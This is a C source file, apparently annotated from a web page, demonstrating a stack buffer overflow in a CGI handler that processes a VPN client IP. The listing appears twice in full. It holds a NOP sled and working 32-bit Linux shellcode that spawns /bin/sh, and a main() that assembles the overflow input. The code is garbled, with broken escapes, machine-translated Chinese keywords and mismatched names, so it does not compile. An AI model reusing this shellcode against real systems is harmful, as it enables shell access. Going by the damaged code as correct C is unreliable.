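#include <stdio.h>
#include <string.h>

// Size of the stack buffer declared inside apply_cgi().
#define max_len 256
// Extra bytes main() adds on top of max_len when sizing its input array.
// (The directive and the macro name were capitalised on the page, which is
// not a valid preprocessor directive and did not match the lowercase name used in main().)
#define buffer_overrun_length 50
// Declared size of the nop_sled and shellCode arrays.
#define shellcode_length 32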
// NOP sled: a run of x86 NOP bytes (0x90) placed in front of the shellcode to
// increase the chance that the shellcode is executed successfully.
// NOTE(review): this initializer is damaged on the page (single quotes, spaces
// inside the escapes) and appears to list more bytes than shellcode_length
// allows; it is not valid C as shown, so treat it as illustrative only.
// Defender note: long 0x90 runs are a common IDS signature, and a
// non-executable stack (NX/DEP) keeps stack-resident bytes like these from running.
char nop_sled [shellcode_length]='\ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90';
// shellCode: bytes that execute /bin/sh. The embedded 2f 2f 73 68 and
// 2f 62 69 6e are the ASCII for "//sh" and "/bin"; cd 80 is the 32-bit Linux
// int 0x80 system-call trap.
// NOTE(review): the literal is single-quoted on the page, so it is not valid C as shown.
char shellCode [shellcode_length]='\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80';
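// Stand-in for the CGI handler the page calls "the vulnerable function":
// copies the caller-supplied client IP string into a fixed stack buffer and
// prints it.
//
// vpn_client_ip: NUL-terminated string from the caller (untrusted); a NULL
//                pointer is ignored.
//
// Review note: the copy on the page was strncpy(buffer, vpn_client_ip, max_len).
// That bound equals the buffer size, so it never writes past `buffer`, but it
// leaves `buffer` without a terminating NUL whenever the input is max_len bytes
// or longer, and the following printf("%s") then reads past the end of the
// array. snprintf() always terminates and truncates over-long input instead.
void apply_cgi(char *vpn_client_ip){
    char buffer[max_len];

    if (vpn_client_ip == NULL) {
        return;
    }

    // Bounded, always-terminated copy; input longer than max_len - 1 is truncated.
    snprintf(buffer, sizeof buffer, "%s", vpn_client_ip);

    // The format string on the page was single-quoted with a broken "\ n"
    // escape; it is restored to a normal string literal ending in a newline.
    printf("客户端IP:%s\n", buffer);
}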
// Demonstration driver: assembles an over-long input from the NOP sled and the
// shellcode and hands it to apply_cgi().
// NOTE(review): this function was altered by machine translation and does not
// compile as shown. The array declaration and the return statement have had
// their identifier/keyword replaced, `nop_ssled` does not match the `nop_sled`
// array declared above, and the strncpy() calls are given single array
// elements where a destination pointer is expected.
// NOTE(review): nothing here checks that `offset` is non-negative or lies
// inside the array before it is used as a length and as an index (TODO confirm
// intended values).
int main(){
char输入[max_len + buffer_overrun_length]={0};
// Build the buffer that holds the malicious input:
// the NOP sled, the shellcode and the overflow data.
int offset=strlen(nop_sled) + strlen(shellCode)-buffer_overrun_length;
strncpy(输入[0],nop_ssled,offset);
strncpy(输入[offset],shellCode,shellcode_length);
// Force a terminating NUL in the last element of the array.
输入[max_len + buffer_overrun_length -1]='\ x00';
// Call the vulnerable function to trigger the buffer overflow.
// The array passed in is larger than max_len, so the callee has to bound its copy.
apply_cgi(输入);
返回0;
}
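// NOTE(review): from this point the page repeats the same listing a second
// time; these definitions duplicate the ones at the top of the file.
#include <string.h>

// Size of the stack buffer declared inside apply_cgi().
#define max_len 256
// Extra bytes main() adds on top of max_len when sizing its input array.
// (The directive and the macro name were capitalised on the page, which is
// not a valid preprocessor directive and did not match the lowercase name used in main().)
#define buffer_overrun_length 50
// Declared size of the nop_sled and shellCode arrays.
#define shellcode_length 32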
// NOP sled: a run of x86 NOP bytes (0x90) placed in front of the shellcode to
// increase the chance that the shellcode is executed successfully.
// NOTE(review): this initializer is damaged on the page (single quotes, spaces
// inside the escapes) and appears to list more bytes than shellcode_length
// allows; it is not valid C as shown, so treat it as illustrative only.
// Defender note: long 0x90 runs are a common IDS signature, and a
// non-executable stack (NX/DEP) keeps stack-resident bytes like these from running.
char nop_sled [shellcode_length]='\ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90';
// shellCode: bytes that execute /bin/sh. The embedded 2f 2f 73 68 and
// 2f 62 69 6e are the ASCII for "//sh" and "/bin"; cd 80 is the 32-bit Linux
// int 0x80 system-call trap.
// NOTE(review): the literal is single-quoted on the page, so it is not valid C as shown.
char shellCode [shellcode_length]='\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80';
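// Stand-in for the CGI handler the page calls "the vulnerable function":
// copies the caller-supplied client IP string into a fixed stack buffer and
// prints it.
//
// vpn_client_ip: NUL-terminated string from the caller (untrusted); a NULL
//                pointer is ignored.
//
// Review note: the copy on the page was strncpy(buffer, vpn_client_ip, max_len).
// That bound equals the buffer size, so it never writes past `buffer`, but it
// leaves `buffer` without a terminating NUL whenever the input is max_len bytes
// or longer, and the following printf("%s") then reads past the end of the
// array. snprintf() always terminates and truncates over-long input instead.
void apply_cgi(char *vpn_client_ip){
    char buffer[max_len];

    if (vpn_client_ip == NULL) {
        return;
    }

    // Bounded, always-terminated copy; input longer than max_len - 1 is truncated.
    snprintf(buffer, sizeof buffer, "%s", vpn_client_ip);

    // The format string on the page was single-quoted with a broken "\ n"
    // escape; it is restored to a normal string literal ending in a newline.
    printf("客户端IP:%s\n", buffer);
}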
// Demonstration driver: assembles an over-long input from the NOP sled and the
// shellcode and hands it to apply_cgi().
// NOTE(review): this function was altered by machine translation and does not
// compile as shown. The array declaration and the return statement have had
// their identifier/keyword replaced, `nop_ssled` does not match the `nop_sled`
// array declared above, and the strncpy() calls are given single array
// elements where a destination pointer is expected.
// NOTE(review): nothing here checks that `offset` is non-negative or lies
// inside the array before it is used as a length and as an index (TODO confirm
// intended values).
int main(){
char输入[max_len + buffer_overrun_length]={0};
// Build the buffer that holds the malicious input:
// the NOP sled, the shellcode and the overflow data.
int offset=strlen(nop_sled) + strlen(shellCode)-buffer_overrun_length;
strncpy(输入[0],nop_ssled,offset);
strncpy(输入[offset],shellCode,shellcode_length);
// Force a terminating NUL in the last element of the array.
输入[max_len + buffer_overrun_length -1]='\ x00';
// Call the vulnerable function to trigger the buffer overflow.
// The array passed in is larger than max_len, so the callee has to bound its copy.
apply_cgi(输入);
返回0;
}